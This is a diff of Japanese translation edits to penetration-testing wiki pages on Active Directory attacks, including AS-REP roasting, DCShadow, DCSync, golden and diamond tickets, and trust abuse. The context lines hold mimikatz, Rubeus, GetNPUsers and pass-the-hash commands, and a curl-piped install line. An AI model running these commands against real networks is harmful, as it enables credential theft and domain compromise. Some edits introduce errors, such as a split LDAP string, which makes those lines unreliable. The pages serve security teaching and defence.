+1. **LDAPサーバーのセットアップ**: ガイドは[このソース](https://www.server-world.info/en/note?os=Fedora_26&p=openldap)の手順に従います。
 2. **重要なステップ**:
-- OpenLDAP をインストールします。
+- OpenLDAPをインストールします。
 - 管理者パスワードを設定します。
 - 基本スキーマをインポートします。
-- LDAP DB にドメイン名を設定します。
-- LDAP TLS を構成します。
-3. **LDAP サービスの実行**: セットアップが完了したら、LDAP サービスは次のように実行できます:
+- LDAP DBにドメイン名を設定します。
+- LDAP TLSを構成します。
+3. **LDAPサービスの実行**: セットアップが完了したら、LDAPサービスは次のように実行できます:
 ```bash
 slapd -d 2
 ```
diff --git a/src/windows-hardening/active-directory-methodology/asreproast.md b/src/windows-hardening/active-directory-methodology/asreproast.md
index 2c0c7015b..9464b3c1a 100644
--- a/src/windows-hardening/active-directory-methodology/asreproast.md
+++ b/src/windows-hardening/active-directory-methodology/asreproast.md
@@ -9,8 +9,8 @@ ASREPRoastは、**Kerberos事前認証必須属性**が欠如しているユー
 この攻撃の主な要件は次のとおりです：
 
 - **Kerberos事前認証の欠如**：ターゲットユーザーは、このセキュリティ機能が有効になっていない必要があります。
-- **ドメインコントローラー（DC）への接続**：攻撃者は、リクエストを送信し、暗号化されたメッセージを受信するためにDCへのアクセスが必要です。
-- **オプションのドメインアカウント**：ドメインアカウントを持つことで、攻撃者はLDAPクエリを通じて脆弱なユーザーをより効率的に特定できます。そのようなアカウントがない場合、攻撃者はユーザー名を推測する必要があります。
+- **ドメインコントローラー（DC）への接続**：攻撃者は、リクエストを送信し、暗号化されたメッセージを受信するためにDCにアクセスする必要があります。
+- **オプションのドメインアカウント**：ドメインアカウントを持つことで、攻撃者はLDAPクエリを通じて脆弱なユーザーをより効率的に特定できます。そのようなアカウントがない場合、攻撃者はユーザー名を推測しなければなりません。
 
 #### 脆弱なユーザーの列挙（ドメイン資格情報が必要）
 ```bash:Using Windows
@@ -20,7 +20,7 @@ Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
 ```bash:Using Linux
 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
 ```
-#### AS_REPメッセージを要求する
+#### AS_REPメッセージのリクエスト
 ```bash:Using Linux
 #Try all the usernames in usernames.txt
 python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
@@ -33,7 +33,7 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
 Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
 ```
 > [!WARNING]
-> AS-REP Roasting with Rubeus は、暗号化タイプ 0x17 および事前認証タイプ 0 の 4768 を生成します。
+> AS-REP Roasting with Rubeus は、暗号化タイプ 0x17 および プリアuthタイプ 0 の 4768 を生成します。
 
 ### クラッキング
 ```bash
@@ -42,7 +42,7 @@ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 ```
 ### Persistence
 
-**GenericAll** 権限（またはプロパティを書き込む権限）があるユーザーに対して **preauth** を強制する必要はありません：
+**GenericAll** 権限（またはプロパティを書き込む権限）があるユーザーに対して **preauth** を強制する必要はありません。
 ```bash:Using Windows
 Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
 ```
@@ -53,7 +53,7 @@ bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac
 ## ASREProast without credentials
 
 攻撃者は、Kerberosの事前認証が無効になっていることに依存せず、ネットワークを横断するAS-REPパケットをキャプチャするために中間者の位置を利用できます。したがって、VLAN上のすべてのユーザーに対して機能します。\
-[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) はそのためのツールです。さらに、このツールはKerberosの交渉を変更することによってクライアントワークステーションにRC4を使用させることを強制します。
+[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) は、これを可能にします。さらに、このツールはKerberosの交渉を変更することによって、クライアントワークステーションにRC4を使用させることを強制します。
 ```bash
 # Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
 ASRepCatcher relay -dc $DC_IP
diff --git a/src/windows-hardening/active-directory-methodology/bloodhound.md b/src/windows-hardening/active-directory-methodology/bloodhound.md
index beecbb719..a450c249d 100644
--- a/src/windows-hardening/active-directory-methodology/bloodhound.md
+++ b/src/windows-hardening/active-directory-methodology/bloodhound.md
@@ -11,7 +11,7 @@
 ### Snapshots
 
 AD Explorer は AD のスナップショットを作成できるため、オフラインで確認できます。\
-オフラインで脆弱性を発見したり、時間を通じて AD DB の異なる状態を比較したりするために使用できます。
+オフラインで脆弱性を発見したり、時間の経過に伴う AD DB の異なる状態を比較するために使用できます。
 
 接続するためには、ユーザー名、パスワード、および接続先のディレクションが必要です（任意の AD ユーザーが必要です）。
 
@@ -30,7 +30,7 @@ From [https://github.com/BloodHoundAD/BloodHound](https://github.com/BloodHoundA
 
 > BloodHoundは、[Linkurious](http://linkurio.us/)の上に構築された単一ページのJavascriptウェブアプリケーションで、[Electron](http://electron.atom.io/)でコンパイルされ、C#データコレクターによって供給される[Neo4j](https://neo4j.com/)データベースを持っています。
 
-BloodHoundは、グラフ理論を使用して、Active DirectoryまたはAzure環境内の隠れた、しばしば意図しない関係を明らかにします。攻撃者はBloodHoundを使用して、迅速に特定することが不可能な非常に複雑な攻撃経路を簡単に特定できます。防御者はBloodHoundを使用して、同じ攻撃経路を特定し排除することができます。ブルーチームとレッドチームの両方がBloodHoundを使用して、Active DirectoryまたはAzure環境における特権関係をより深く理解することができます。
+BloodHoundは、グラフ理論を使用して、Active DirectoryまたはAzure環境内の隠れた、しばしば意図しない関係を明らかにします。攻撃者はBloodHoundを使用して、迅速に特定することが不可能な非常に複雑な攻撃経路を簡単に特定できます。防御者はBloodHoundを使用して、同じ攻撃経路を特定し排除することができます。ブルーチームとレッドチームの両方が、Active DirectoryまたはAzure環境内の特権関係をより深く理解するためにBloodHoundを簡単に使用できます。
 
 したがって、[Bloodhound](https://github.com/BloodHoundAD/BloodHound)は、ドメインを自動的に列挙し、すべての情報を保存し、可能な特権昇格経路を見つけ、グラフを使用してすべての情報を表示する素晴らしいツールです。
 
@@ -42,17 +42,17 @@ BloodHoundは、**ingestors**と**visualisation application**の2つの主要な
 
 ### Installation
 
-BloodHound CEの作成後、プロジェクト全体がDockerを使用しやすく更新されました。始める最も簡単な方法は、事前に構成されたDocker Compose構成を使用することです。
+BloodHound CEの作成後、プロジェクト全体がDockerを使用しやすくするために更新されました。始める最も簡単な方法は、事前に構成されたDocker Compose構成を使用することです。
 
 1. Docker Composeをインストールします。これは[Docker Desktop](https://www.docker.com/products/docker-desktop/)のインストールに含まれているはずです。
-2. 実行します:
+2. 実行:
 ```
 curl -L https://ghst.ly/getbhce | docker compose -f - up
 ```
-3. Docker Composeのターミナル出力にあるランダムに生成されたパスワードを見つけます。
-4. ブラウザでhttp://localhost:8080/ui/loginに移動します。ユーザー名にadminを入力し、ログからのランダムに生成されたパスワードでログインします。
+3. Docker Composeのターミナル出力でランダムに生成されたパスワードを見つけます。  
+4. ブラウザで http://localhost:8080/ui/login に移動します。ユーザー名にadmin、ログからのランダムに生成されたパスワードでログインします。
 
-その後、ランダムに生成されたパスワードを変更する必要があり、新しいインターフェースが準備されます。そこから直接イングestorをダウンロードできます。
+その後、ランダムに生成されたパスワードを変更する必要があり、新しいインターフェースが準備されます。そこから直接ingestorsをダウンロードできます。
 
 ### SharpHound
 
@@ -71,7 +71,7 @@ runas /netonly /user:domain\user "powershell.exe -exec bypass"
 
 ## Group3r
 
-[**Group3r**](https://github.com/Group3r/Group3r) は、**グループポリシー**に関連するActive Directoryの**脆弱性**を見つけるためのツールです。 \
+[**Group3r**](https://github.com/Group3r/Group3r)は、**グループポリシー**に関連するActive Directoryの**脆弱性**を見つけるためのツールです。 \
 **任意のドメインユーザー**を使用して、ドメイン内のホストから**group3rを実行する**必要があります。
 ```bash
 group3r.exe -f <filepath-name.log>
diff --git a/src/windows-hardening/active-directory-methodology/constrained-delegation.md b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
index 67bbaba41..4350cb2af 100644
--- a/src/windows-hardening/active-directory-methodology/constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
@@ -4,16 +4,16 @@
 
 ## 制約付き委任
 
-これを使用すると、ドメイン管理者はコンピュータが**ユーザーまたはコンピュータを**サービスに対して**なりすます**ことを**許可**できます。
+これを使用すると、ドメイン管理者はコンピュータに対してユーザーまたはコンピュータをサービスに対して**なりすます**ことを**許可**できます。
 
-- **ユーザー自身のサービス (**_**S4U2self**_**):** もし**サービスアカウント**が _userAccountControl_ 値に [TRUSTED_TO_AUTH_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) (T2A4D) を含んでいる場合、そのアカウントは他の任意のユーザーの代わりに自分自身（サービス）のためにTGSを取得できます。
-- **プロキシのためのユーザーサービス(**_**S4U2proxy**_**):** **サービスアカウント**は、**msDS-AllowedToDelegateTo** に設定されたサービスのために任意のユーザーの代わりにTGSを取得できます。そのためには、まずそのユーザーから自分自身へのTGSが必要ですが、S4U2selfを使用してそのTGSを取得した後に他のTGSを要求できます。
+- **ユーザー自身のサービス (**_**S4U2self**_**):** もし**サービスアカウント**が _userAccountControl_ 値に [TRUSTED_TO_AUTH_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) (T2A4D) を含んでいる場合、そのアカウントは他の任意のユーザーを代表して自分自身（サービス）のためにTGSを取得できます。
+- **プロキシのためのユーザーサービス(**_**S4U2proxy**_**):** **サービスアカウント**は、**msDS-AllowedToDelegateTo** に設定されたサービスのために任意のユーザーを代表してTGSを取得できます。そのためには、まずそのユーザーから自分自身へのTGSが必要ですが、S4U2selfを使用してそのTGSを取得した後に他のTGSを要求できます。
 
 **注意**: ユーザーがADで「_アカウントは機密であり、委任できません_」とマークされている場合、そのユーザーを**なりすます**ことは**できません**。
 
-これは、**サービスのハッシュを侵害**すると、**ユーザーをなりすまし**、そのユーザーの代わりに**サービスにアクセス**できることを意味します（可能な**権限昇格**）。
+これは、**サービスのハッシュを侵害**すると、ユーザーを**なりすまし**、そのユーザーの代わりに**サービスにアクセス**できることを意味します（可能な**権限昇格**）。
 
-さらに、**ユーザーがなりすますことができるサービスへのアクセスだけでなく、任意のサービスへのアクセスも**得られます。なぜなら、SPN（要求されたサービス名）はチェックされず、特権のみがチェックされるからです。したがって、**CIFSサービス**にアクセスできる場合、Rubeusの`/altservice`フラグを使用して**HOSTサービス**にもアクセスできます。
+さらに、**ユーザーがなりすますことができるサービスへのアクセスだけでなく、任意のサービスへのアクセスも**得られます。なぜなら、SPN（要求されたサービス名）はチェックされず、特権のみがチェックされるからです。したがって、**CIFSサービス**へのアクセスがあれば、Rubeusの`/altservice`フラグを使用して**HOSTサービス**にもアクセスできます。
 
 また、**DC上のLDAPサービスアクセス**は、**DCSync**を悪用するために必要です。
 ```bash:Enumerate
diff --git a/src/windows-hardening/active-directory-methodology/custom-ssp.md b/src/windows-hardening/active-directory-methodology/custom-ssp.md
index fe224d2fb..6ef7c1101 100644
--- a/src/windows-hardening/active-directory-methodology/custom-ssp.md
+++ b/src/windows-hardening/active-directory-methodology/custom-ssp.md
@@ -5,13 +5,13 @@
 ### カスタム SSP
 
 [SSP (セキュリティサポートプロバイダー) についてはこちらで学んでください。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
-自分の**SSP**を作成して、**クリアテキスト**で**資格情報**を**キャプチャ**することができます。
+**自分の SSP** を作成して、マシンにアクセスするために使用される **資格情報** を **平文** で **キャプチャ** できます。
 
 #### Mimilib
 
-Mimikatzによって提供される`mimilib.dll`バイナリを使用できます。**これにより、すべての資格情報がクリアテキストでファイルにログされます。**\
-dllを`C:\Windows\System32\`に配置します。\
-既存のLSAセキュリティパッケージのリストを取得します：
+Mimikatz によって提供される `mimilib.dll` バイナリを使用できます。**これにより、すべての資格情報が平文でファイルにログされます。**\
+dll を `C:\Windows\System32\` に配置します。\
+既存の LSA セキュリティパッケージのリストを取得します：
 ```bash:attacker@target
 PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
 
@@ -31,7 +31,7 @@ Mimikatzを使用して、これをメモリ内に直接注入することもで
 privilege::debug
 misc::memssp
 ```
-これは再起動に耐えません。
+これは再起動では生き残りません。
 
 #### 緩和策
 
diff --git a/src/windows-hardening/active-directory-methodology/dcshadow.md b/src/windows-hardening/active-directory-methodology/dcshadow.md
index ee76768e2..da394ee44 100644
--- a/src/windows-hardening/active-directory-methodology/dcshadow.md
+++ b/src/windows-hardening/active-directory-methodology/dcshadow.md
@@ -15,12 +15,12 @@ lsadump::dcshadow /object:username /attribute:Description /value="My new descrip
 ```bash:mimikatz2 (push) - Needs DA or similar
 lsadump::dcshadow /push
 ```
-注意してください **`elevate::token`** は `mimikatz1` セッションでは機能しません。これはスレッドの特権を昇格させますが、私たちは **プロセスの特権を昇格させる** 必要があります。\
+**`elevate::token`** は `mimikatz1` セッションでは機能しません。なぜなら、これはスレッドの特権を昇格させるだけで、私たちは **プロセスの特権を昇格させる** 必要があるからです。\
 また、"LDAP" オブジェクトを選択することもできます: `/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local`
 
 DA からまたはこの最小限の権限を持つユーザーから変更をプッシュできます:
 
-- **ドメインオブジェクト**内:
+- **ドメインオブジェクト**内で:
 - _DS-Install-Replica_ (ドメイン内のレプリカの追加/削除)
 - _DS-Replication-Manage-Topology_ (レプリケーショントポロジーの管理)
 - _DS-Replication-Synchronize_ (レプリケーションの同期)
@@ -31,7 +31,7 @@ DA からまたはこの最小限の権限を持つユーザーから変更を
 - **ターゲットオブジェクト**:
 - _WriteProperty_ (Not Write)
 
-[**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) を使用して、特権のないユーザーにこれらの権限を与えることができます (これによりいくつかのログが残ることに注意してください)。これは DA 権限を持つよりもはるかに制限されています。\
+[**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) を使用して、特権のないユーザーにこれらの権限を与えることができます (これはいくつかのログを残すことに注意してください)。これは DA 権限を持つよりもはるかに制限されています。\
 例えば: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` これは、ユーザー名 _**student1**_ がマシン _**mcorp-student1**_ にログインしているときに、オブジェクト _**root1user**_ に対して DCShadow 権限を持つことを意味します。
 
 ## DCShadow を使用してバックドアを作成する
@@ -61,7 +61,7 @@ lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attr
 - ターゲットユーザーオブジェクト上：`(A;;WP;;;UserSID)`
 - 設定コンテナ内のサイトオブジェクト上：`(A;CI;CCDC;;;UserSID)`
 
-オブジェクトの現在のACEを取得するには：`(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl`
+オブジェクトの現在のACEを取得するには：`(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl`
 
 この場合、**いくつかの変更を行う必要がある**ことに注意してください。したがって、**mimikatz1セッション**（RPCサーバー）で、行いたい各変更に対して**`/stack`パラメータを使用**してください。この方法では、すべてのスタックされた変更をルージュサーバーで実行するために**`/push`**を一度だけ実行する必要があります。
 
diff --git a/src/windows-hardening/active-directory-methodology/dcsync.md b/src/windows-hardening/active-directory-methodology/dcsync.md
index 6d52a3225..c2687eeca 100644
--- a/src/windows-hardening/active-directory-methodology/dcsync.md
+++ b/src/windows-hardening/active-directory-methodology/dcsync.md
@@ -41,7 +41,7 @@ Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD
 
 ### 永続性
 
-ドメイン管理者であれば、`powerview`を使用して任意のユーザーにこの権限を付与できます：
+ドメイン管理者であれば、`powerview`の助けを借りて、任意のユーザーにこの権限を付与できます：
 ```powershell
 Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
 ```
@@ -49,14 +49,14 @@ Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -Pr
 ```powershell
 Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
 ```
-### 緩和策
+### Mitigation
 
-- セキュリティイベントID 4662 (オブジェクトの監査ポリシーを有効にする必要があります) – オブジェクトに対して操作が行われました
-- セキュリティイベントID 5136 (オブジェクトの監査ポリシーを有効にする必要があります) – ディレクトリサービスオブジェクトが変更されました
-- セキュリティイベントID 4670 (オブジェクトの監査ポリシーを有効にする必要があります) – オブジェクトの権限が変更されました
-- AD ACLスキャナー - ACLの作成と比較レポートを作成します。 [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
+- Security Event ID 4662 (Audit Policy for object must be enabled) – オブジェクトに対して操作が実行されました
+- Security Event ID 5136 (Audit Policy for object must be enabled) – ディレクトリサービスオブジェクトが変更されました
+- Security Event ID 4670 (Audit Policy for object must be enabled) – オブジェクトの権限が変更されました
+- AD ACL Scanner - ACLの作成と比較レポートを作成します。 [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
 
-## 参考文献
+## References
 
 - [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
 - [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)
diff --git a/src/windows-hardening/active-directory-methodology/diamond-ticket.md b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
index 3ce627a86..f4529db6d 100644
--- a/src/windows-hardening/active-directory-methodology/diamond-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
@@ -4,17 +4,17 @@
 
 ## ダイヤモンドチケット
 
-**ゴールデンチケットのように**、ダイヤモンドチケットは**任意のユーザーとして任意のサービスにアクセスするために使用できるTGT**です。ゴールデンチケットは完全にオフラインで作成され、そのドメインのkrbtgtハッシュで暗号化され、ログオンセッションに渡されて使用されます。ドメインコントローラーは、正当に発行されたTGTを追跡しないため、自身のkrbtgtハッシュで暗号化されたTGTを喜んで受け入れます。
+**ゴールデンチケットのように**、ダイヤモンドチケットは**任意のユーザーとして任意のサービスにアクセスするために使用できるTGT**です。ゴールデンチケットは完全にオフラインで偽造され、そのドメインのkrbtgtハッシュで暗号化され、使用のためにログオンセッションに渡されます。ドメインコントローラーは、正当に発行されたTGTを追跡しないため、独自のkrbtgtハッシュで暗号化されたTGTを喜んで受け入れます。
 
 ゴールデンチケットの使用を検出するための一般的な2つの技術があります：
 
-- 対応するAS-REQがないTGS-REQを探す。
-- Mimikatzのデフォルトの10年の有効期限のような、ばかげた値を持つTGTを探す。
+- 対応するAS-REQがないTGS-REQを探します。
+- Mimikatzのデフォルトの10年の有効期限のような、ばかげた値を持つTGTを探します。
 
 **ダイヤモンドチケット**は、**DCによって発行された正当なTGTのフィールドを変更することによって作成されます**。これは、**TGTを要求し**、ドメインのkrbtgtハッシュで**復号化し**、チケットの希望するフィールドを**変更し**、その後**再暗号化する**ことによって達成されます。これは、ゴールデンチケットの前述の2つの欠点を**克服します**：
 
 - TGS-REQには前にAS-REQがあります。
-- TGTはDCによって発行されたため、ドメインのKerberosポリシーからのすべての正しい詳細を持っています。これらはゴールデンチケットで正確に偽造することができますが、より複雑でミスが起こりやすいです。
+- TGTはDCによって発行されたため、ドメインのKerberosポリシーからのすべての正しい詳細を持っています。これらはゴールデンチケットで正確に偽造できますが、より複雑でミスが起こりやすいです。
 ```bash
 # Get user RID
 powershell Get-DomainUser -Identity <username> -Properties objectsid
diff --git a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
index d12b90751..7eaea1240 100644
--- a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
@@ -13,16 +13,16 @@ Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLog
 New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
 Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"
 ```
-その後、PTHを使用して**C$の内容をリストしたり、シェルを取得したりできます**。そのハッシュをメモリ内で使用して新しいPowerShellセッションを作成する際（PTH用）には、**使用される「ドメイン」はDCマシンの名前だけです。**
+その後、PTHを使用して**C$の内容をリストしたり、シェルを取得したりできます**。そのハッシュをメモリ内で使用して新しいPowerShellセッションを作成する際（PTH用に）**「ドメイン」として使用されるのはDCマシンの名前だけです:**
 ```bash
 sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
 #And in new spawned powershell you now can access via NTLM the content of C$
 ls \\dc-host-name\C$
 ```
-より詳しい情報は次のリンクを参照してください: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) と [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)
+より詳しい情報は、[https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) と [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785) を参照してください。
 
 ## 緩和策
 
-- イベント ID 4657 - `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior` の作成/変更の監査
+- イベント ID 4657 - `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior` の監査作成/変更
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index 45e80367e..7da51aa2a 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -36,11 +36,11 @@ MemberDistinguishedName : CN=S-1-5-21-1028541967-2937615241-1935644758-1115,CN=F
 ```powershell
 Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
 ```
-この抽出は、名前の後に**$**が付いたアカウントがアクティブで、ドメイン**A**の「Domain Users」グループに属しているため、可能です。これにより、このグループに関連付けられた権限を継承します。これにより、個人はこのアカウントの資格情報を使用してドメイン**A**に対して認証できます。
+この抽出は、名前の後に**$**が付いたアカウントがアクティブであり、ドメイン**A**の「Domain Users」グループに属しているため、これに関連する権限を継承しているため可能です。これにより、個人はこのアカウントの資格情報を使用してドメイン**A**に対して認証を行うことができます。
 
 **警告:** この状況を利用して、ユーザーとしてドメイン**A**に足場を築くことが可能ですが、権限は限られています。しかし、このアクセスはドメイン**A**での列挙を行うには十分です。
 
-`ext.local`が信頼するドメインで、`root.local`が信頼されたドメインであるシナリオでは、`root.local`内に`EXT$`という名前のユーザーアカウントが作成されます。特定のツールを使用することで、Kerberos信頼キーをダンプし、`root.local`内の`EXT$`の資格情報を明らかにすることができます。これを達成するためのコマンドは次のとおりです:
+`ext.local`が信頼するドメインで、`root.local`が信頼されたドメインであるシナリオでは、`root.local`内に`EXT$`という名前のユーザーアカウントが作成されます。特定のツールを使用することで、Kerberos信頼キーをダンプし、`root.local`内の`EXT$`の資格情報を明らかにすることが可能です。これを達成するためのコマンドは次のとおりです:
 ```bash
 lsadump::trust /patch
 ```
@@ -56,11 +56,11 @@ lsadump::trust /patch
 
 前のフローでは、**明文パスワード**の代わりに信頼ハッシュが使用されました（これは**mimikatzによってダンプされました**）。
 
-明文パスワードは、mimikatzの\[ CLEAR \]出力を16進数から変換し、ヌルバイト‘\x00’を削除することで取得できます：
+明文パスワードは、mimikatzの\[ CLEAR ]出力を16進数から変換し、ヌルバイト‘\x00’を削除することで取得できます：
 
 ![](<../../images/image (938).png>)
 
-信頼関係を作成する際に、ユーザーが信頼のためにパスワードを入力する必要がある場合があります。このデモでは、キーは元の信頼パスワードであり、したがって人間が読めるものです。キーがサイクルする（30日）と、明文は人間が読めないものになりますが、技術的には依然として使用可能です。
+信頼関係を作成する際に、ユーザーが信頼のためにパスワードを入力する必要がある場合があります。このデモでは、キーは元の信頼パスワードであり、したがって人間が読み取れるものです。キーがサイクルする（30日）と、明文は人間が読み取れなくなりますが、技術的には依然として使用可能です。
 
 明文パスワードは、信頼アカウントとして通常の認証を行うために使用でき、信頼アカウントのKerberos秘密鍵を使用してTGTを要求する代替手段となります。ここでは、ext.localからroot.localに対してDomain Adminsのメンバーをクエリしています：
 
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
index 2c67f23db..0a22e109d 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
@@ -60,7 +60,7 @@ IsDomain     : True
 
 ## 初期アクセス
 
-他のドメインでユーザーの**特別な**アクセスを見つけられなかった場合でも、ADメソッドに戻り、**特権のないユーザーからのプライベートエスカレーション**を試みることができます（例えば、kerberoastingなど）：
+他のドメインでユーザーの**特別な**アクセスを見つけられなかった場合でも、ADメソッドに戻り、**特権のないユーザーからの昇格**を試みることができます（例えば、kerberoastingなど）：
 
 **Powerview関数**を使用して、`-Domain`パラメータを使って**他のドメイン**を**列挙**できます。
 ```powershell
@@ -74,7 +74,7 @@ Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
 
 ### ログイン
 
-外部ドメインにアクセス権を持つユーザーの資格情報を使用して、通常の方法でアクセスできるはずです:
+外部ドメインにアクセス権を持つユーザーの資格情報を使用して、通常の方法でログインすることで、次の内容にアクセスできるはずです：
 ```powershell
 Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
 ```
@@ -91,7 +91,7 @@ Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\admini
 > Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
 > ```
 
-現在のドメインのユーザーを**偽装する**TGTを**信頼された**キーで**署名する**ことができます。
+現在のドメインのユーザーを**偽装するTGTを**、**信頼された**キーで**署名する**ことができます。
 ```bash
 # Get a TGT for the cross-domain privileged user to the other domain
 Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
diff --git a/src/windows-hardening/active-directory-methodology/golden-ticket.md b/src/windows-hardening/active-directory-methodology/golden-ticket.md
index 696f9a74e..eb7521811 100644
--- a/src/windows-hardening/active-directory-methodology/golden-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/golden-ticket.md
@@ -26,7 +26,7 @@ kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1
 ```
 **一度** **golden Ticket** が注入されると、共有ファイル **(C$)** にアクセスでき、サービスや WMI を実行できるため、**psexec** や **wmiexec** を使用してシェルを取得できます（winrm 経由でシェルを取得できないようです）。
 
-### 一般的な検出の回避
+### 一般的な検出を回避する
 
 golden ticket を検出する最も一般的な方法は、**ケルベロストラフィック** をワイヤ上で検査することです。デフォルトでは、Mimikatz は **TGT を 10 年間署名** するため、それを使用して行われる後続の TGS リクエストで異常として目立ちます。
 
@@ -36,7 +36,7 @@ golden ticket を検出する最も一般的な方法は、**ケルベロスト
 ```
 Get-DomainPolicy | select -expand KerberosPolicy
 ```
-残念ながら、TGTの有効期限は4769のログに記録されていないため、この情報はWindowsイベントログには見つかりません。しかし、相関させることができるのは、**前の4768なしで4769を見ること**です。**TGTなしでTGSを要求することは不可能**であり、TGTが発行された記録がない場合、オフラインで偽造されたと推測できます。
+残念ながら、TGTの有効期限は4769のログに記録されていないため、この情報はWindowsイベントログには見つかりません。しかし、相関させることができるのは、**前の4768なしで4769を見ること**です。**TGTなしでTGSを要求することは不可能**であり、TGTが発行された記録がない場合、それがオフラインで偽造されたと推測できます。
 
 この検出を**回避するために**、ダイヤモンドチケットを確認してください：
 
diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md
index 51c8cc131..ab09fc52a 100644
--- a/src/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/src/windows-hardening/active-directory-methodology/kerberoast.md
@@ -4,14 +4,14 @@
 
 ## Kerberoast
 
-Kerberoastingは、**Active Directory (AD)**内の**ユーザーアカウント**に関連する**TGSチケット**の取得に焦点を当てており、**コンピューターアカウント**は除外されます。これらのチケットの暗号化は**ユーーパスワード**から生成されたキーを使用しており、**オフラインの資格情報クラッキング**の可能性を提供します。ユーザーアカウントをサービスとして使用することは、非空の**"ServicePrincipalName"**プロパティによって示されます。
